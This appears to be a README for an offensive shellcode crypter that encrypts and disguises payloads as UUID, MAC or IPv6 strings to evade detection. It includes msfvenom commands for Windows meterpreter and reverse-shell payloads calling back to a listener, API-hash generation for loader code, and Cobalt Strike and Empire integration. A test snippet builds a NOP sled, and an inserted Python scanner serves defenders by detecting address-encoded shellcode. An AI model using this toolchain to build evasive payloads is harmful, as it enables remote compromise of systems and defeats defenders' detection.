Advanced Shellcode Encoder/Crypter with Evasion Capabilities

1x0DF0/ErebusShell

ErebusShell

ErebusShell is a shellcode encryption and obfuscation toolkit for red team operations and malware development research. It supports various encryption algorithms, obfuscation methods, and output formats, with integration for tools like Metasploit and Cobalt Strike.

Installation

Requirements

  • Python 3.8 or higher
  • cryptography library (for AES and ChaCha20)

Steps

  1. Clone the repository:
    git clone https://github.com/1x0DF0/ErebusShell
    cd ErebusShell
    
  2. Install dependencies:
    pip install cryptography
    
  3. On Linux or macOS, make the script executable:
    chmod +x erebusshell.py
    

Usage

Run the tool with python erebusshell.py <command> [options].

Basic Encryption

To encrypt a shellcode file:

python erebusshell.py encrypt payload.bin xor -o encrypted.bin

For RC4 with a custom key:

python erebusshell.py encrypt payload.bin rc4 --key deadbeef12345678

For AES-CBC:

python erebusshell.py encrypt payload.bin aes_cbc -o encrypted.aes

Generating and Encrypting Metasploit Payload

  1. Generate the payload:
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin
    
  2. Encrypt it:
    python erebusshell.py encrypt payload.bin layered --save-metadata -o encrypted.bin
    
  3. Output as C array:
    python erebusshell.py encrypt payload.bin rc4 -f c > shellcode.h
    

Obfuscation

For UUID format:

python erebusshell.py encrypt payload.bin uuid -o uuids.txt

For MAC address format:

python erebusshell.py encrypt payload.bin mac

For IPv6 format:

python erebusshell.py encrypt payload.bin ipv6 -o ipv6_list.txt
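
A defender-side triage check for the three address-style formats above, added here as an example and not part of ErebusShell: it flags text that contains many UUID, MAC or IPv6 tokens and reports the entropy of the bytes they carry. It assumes the tool emits the standard textual forms of those types; the function names, the 8-token threshold and the sample inputs are constructed for illustration.

```python
import ipaddress
import math
import re
import uuid
from collections import Counter

UUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")
MAC_RE = re.compile(r"(?:[0-9a-fA-F]{2}[:-]){5}[0-9a-fA-F]{2}")
SPLIT_RE = re.compile(r"[\s,;\"'{}()\[\]]+")   # separators around array elements
SIZES = {"uuid": 16, "mac": 6, "ipv6": 16}      # bytes carried per token

def decode_token(tok):
    """Return (kind, raw_bytes) for a UUID, MAC or IPv6 literal, else None."""
    if UUID_RE.fullmatch(tok):
        return "uuid", bytes.fromhex(tok.replace("-", ""))
    if MAC_RE.fullmatch(tok):
        return "mac", bytes.fromhex(re.sub(r"[:-]", "", tok))
    if ":" in tok:
        try:
            return "ipv6", ipaddress.IPv6Address(tok).packed
        except ValueError:
            return None
    return None

def shannon_entropy(data):
    """Bits per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def scan(text, min_tokens=8):
    """Report each address-style kind that appears at least min_tokens times."""
    blobs = {}
    for tok in SPLIT_RE.split(text):
        hit = decode_token(tok)
        if hit:
            blobs.setdefault(hit[0], bytearray()).extend(hit[1])
    return {kind: {"tokens": len(raw) // SIZES[kind], "bytes": len(raw),
                   "entropy": round(shannon_entropy(raw), 2)}
            for kind, raw in blobs.items() if len(raw) // SIZES[kind] >= min_tokens}

# Constructed inputs: 128 synthetic bytes as 8 UUID strings, and a benign log line.
_raw = bytes((i * 37 + 11) % 256 for i in range(128))
SAMPLE = ",\n".join(f'"{uuid.UUID(bytes=_raw[i:i + 16])}"' for i in range(0, 128, 16))
BENIGN = "eth0 link aa:bb:cc:00:11:22 peer aa:bb:cc:00:11:23 up"

if __name__ == "__main__":
    print(scan(SAMPLE))   # {'uuid': {'tokens': 8, 'bytes': 128, 'entropy': 7.0}}
    print(scan(BENIGN))   # {}
```

Lists of random version-4 UUIDs are also high-entropy, so treat a hit as a reason to look closer rather than a verdict.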

API Hash Generation

Create a file with API names (e.g., apis.txt):

kernel32.dll
ntdll.dll
VirtualAlloc
VirtualProtect
CreateThread

Generate hashes:

python erebusshell.py hash --api-file apis.txt -o api_hashes.h

Command Reference

Encrypt

python erebusshell.py encrypt [OPTIONS] INPUT METHOD
  • INPUT: Input shellcode file
  • METHOD: Encryption method (e.g., xor, rc4, aes_cbc)
  • Options:
    • -o, --output FILE: Output file
    • -f, --format FORMAT: Output format (c, python, raw, etc.)
    • -k, --key HEX: Use specific key (hex)
    • --key-size INT: Key size in bytes (default: 16)
    • --readable-key: Generate ASCII readable key
    • --compress: Compress before encryption
    • --var-name NAME: Variable name for array output
    • --key-id ID: Identifier to store key
    • --save-metadata: Save metadata to JSON

Hash

python erebusshell.py hash [OPTIONS]
  • Options:
    • --api-file FILE: File containing API names
    • --hash-algorithm ALGO: Algorithm (djb2, ror13, fnv1a)
    • -o, --output FILE: Output header file

Features

  • Encryption: XOR, XOR with feedback, RC4, AES-CBC/CTR, ChaCha20, custom Feistel, layered
  • Obfuscation: MAC addresses, IPv4/IPv6, UUID, Base64/Base85, hex
  • Output: C arrays, C# arrays, Python arrays, PowerShell arrays, raw binary, Base64/hex strings
  • Other: Key management, entropy calculation, optional compression, API hash generation, metadata export

Integration with C2 Frameworks

Metasploit

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=443 -f raw | python erebusshell.py encrypt /dev/stdin rc4 -o encrypted.bin

Cobalt Strike and Empire

Encrypt exported payloads similarly, e.g.:

python erebusshell.py encrypt beacon.bin layered --save-metadata -o beacon_encrypted.bin

Security Notes

  • Store keys securely and use unique keys per operation.
  • Test decryption before use.
  • For high security, use layered encryption.

Testing

Create a test file:

shellcode = b'\x90' * 100  # NOP sled
shellcode += b'\x31\xc0\x50\x68\x2f\x2f\x73\x68'  # Example opcodes
with open('test.bin', 'wb') as f:
    f.write(shellcode)

Encrypt:

python erebusshell.py encrypt test.bin xor --save-metadata

Contributing

Contributions are welcome via pull requests or issues.

License

MIT License - see the LICENSE file.

Disclaimer

This tool is for educational and authorized security testing only. Comply with all laws; authors are not liable for misuse.
